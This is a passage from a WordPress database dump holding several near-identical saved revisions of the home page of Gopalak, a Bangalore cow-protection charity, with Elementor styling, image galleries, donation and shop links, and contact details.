/></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:10:27','2022-10-20 10:40:27','',1373,'https://gopalak.in/?p=1915',0,'revision','',0),(1916,1,'2022-10-20 16:10:27','2022-10-20 10:40:27','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:10:27','2022-10-20 10:40:27','',1373,'https://gopalak.in/?p=1916',0,'revision','',0),(1917,1,'2022-10-20 16:14:55','2022-10-20 10:44:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:14:55','2022-10-20 10:44:55','',1373,'https://gopalak.in/?p=1917',0,'revision','',0),(1918,1,'2022-10-20 16:14:55','2022-10-20 10:44:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" 